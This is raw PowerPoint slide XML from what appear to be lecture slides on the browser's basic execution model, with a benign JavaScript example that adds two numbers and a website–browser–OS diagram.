            <a:off x="6421241" y="1808843"/>
            <a:ext cx="2559050" cy="5842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3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web browser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50A5C9D-CE45-D54E-8BCF-51D92EFB9E58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9713461" y="4085632"/>
            <a:ext cx="692280" cy="497880"/>
            <a:chOff x="9713461" y="4085632"/>
            <a:chExt cx="692280" cy="497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BD3CDCCA-DBD4-B346-8D9F-F94E00E505A0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9713461" y="4085632"/>
                <a:ext cx="692280" cy="44352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BD3CDCCA-DBD4-B346-8D9F-F94E00E505A0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9677821" y="4049992"/>
                  <a:ext cx="763920" cy="51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84359F90-AC4B-974D-85B4-7AA93B52460C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9740461" y="4543912"/>
                <a:ext cx="309960" cy="3960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84359F90-AC4B-974D-85B4-7AA93B52460C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704461" y="4508272"/>
                  <a:ext cx="381600" cy="1112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385792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F04BED5A-E98E-4DA0-BAA5-4F6AB2492D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EB64B94A-E40E-48CE-BD7B-C1A30AE572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3982" y="488542"/>
            <a:ext cx="11244036" cy="5880916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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49EC5CA6-6479-49D5-B4B5-5643D26B83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84442" y="2057401"/>
            <a:ext cx="0" cy="27432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Rectangle 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B26337-5AA4-470D-9687-5907CB53B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685800"/>
            <a:ext cx="10853928" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="sq" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30721" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A96073-235A-E14C-AA58-99D14109B4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94015" y="1004695"/>
            <a:ext cx="3886200" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Browser: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Basic Execution Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5302AB6-FC5D-2E4D-A8BD-37D6B8FF825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963690" y="1000370"/>
            <a:ext cx="6361853" cy="4857262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altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Each browser window or frame:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Loads content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Renders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Processes HTML and executes scripts to display the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>May involve images, subframes, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Responds to events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>User actions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>OnClick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>OnMouseover</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Rendering: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>OnLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>OnUnload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Timing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>clearTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill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244364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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9C538DD-942B-F84F-A05A-C92F2AE466F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HTML and Scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31746" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68A6DE97-17C4-8A48-9A49-E9F5C1A99BAB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066800" y="2103120"/>
            <a:ext cx="10058400" cy="4248694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;html&gt;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altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>      …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altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;p&gt; The script on this page adds two numbers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altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;script&gt;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altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>		var num1, num2, sum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altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>		num1 = prompt("Enter first number")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altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>		num2 = prompt("Enter second number")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altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>		sum = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>parseInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>(num1) + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>parseInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>(num2)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altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>		alert("Sum = " + sum)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altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;/script&gt;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altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>		…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altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80966DBA-F027-C24A-9F19-74C4F9BE29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96843" y="3137938"/>
            <a:ext cx="4245429" cy="1255728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EAEAEA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 type="none" w="lg" len="med"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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Browser receives content,  displays HTML and executes scripts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FF5DAD6D-09C9-2841-BC71-2907A79D23A4}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7548737" y="4449754"/>
              <a:ext cx="2222640" cy="435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FF5DAD6D-09C9-2841-BC71-2907A79D23A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485737" y="4386754"/>
                <a:ext cx="2348280" cy="169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55308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loud 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F9EBB97-3968-044C-B844-A24E6E305FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773055" y="1443147"/>
            <a:ext cx="5407479" cy="3771900"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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87" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624310FE-A614-B043-94B1-00E452AD74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21970" y="2777441"/>
            <a:ext cx="1905000" cy="1103312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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16390" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5252C2A3-4FB2-0D46-94FA-F17027B9824C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3526971" y="2956828"/>
            <a:ext cx="4314825" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2718"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2718"/>
              <a:gd name="T13" fmla="*/ 0 h 253"/>
              <a:gd name="T14" fmla="*/ 2718 w 2718"/>
              <a:gd name="T15" fmla="*/ 253 h 25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718" h="253">
                <a:moveTo>
                  <a:pt x="0" y="216"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="216"/>
                  <a:pt x="146" y="253"/>
                  <a:pt x="408" y="217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="670" y="181"/>
                  <a:pt x="1187" y="2"/>
                  <a:pt x="1572" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1957" y="0"/>
                  <a:pt x="2479" y="167"/>
                  <a:pt x="2718" y="211"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink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391" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A08260A-9FFE-784C-ABB2-E0EE4C9EAB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29096" y="3214004"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16392" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D41CC6B3-1485-474A-886E-DB43188A01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21970" y="3880753"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="hlink"/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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16393" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{381A867E-90CA-9147-89E8-0C37607235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21970" y="4337953"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="hlink"/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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Hardware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16394" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A64ED3-DD56-FB4E-AE84-C71A0B5D5A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13196" y="2798079"/>
            <a:ext cx="10953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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16395" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{909D8D88-4A65-C741-A507-767A33812AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3526970" y="3258454"/>
            <a:ext cx="4305300" cy="455613"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2712"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2712"/>
              <a:gd name="T13" fmla="*/ 0 h 287"/>
              <a:gd name="T14" fmla="*/ 2712 w 2712"/>
              <a:gd name="T15" fmla="*/ 287 h 28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712" h="287">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="244"/>
                  <a:pt x="161" y="287"/>
                  <a:pt x="408" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="655" y="211"/>
                  <a:pt x="1098" y="30"/>
                  <a:pt x="1482" y="15"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1866" y="0"/>
                  <a:pt x="2456" y="129"/>
                  <a:pt x="2712" y="159"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="lg" len="lg"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396" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A45613-34A7-6646-BAAE-9B343E16E6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61970" y="2701242"/>
            <a:ext cx="10223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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16397" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC4ED96F-F240-B944-82EF-DBCBA73308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35361" y="3544203"/>
            <a:ext cx="73501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Monotype Sorts" pitchFamily="2" charset="2"/>
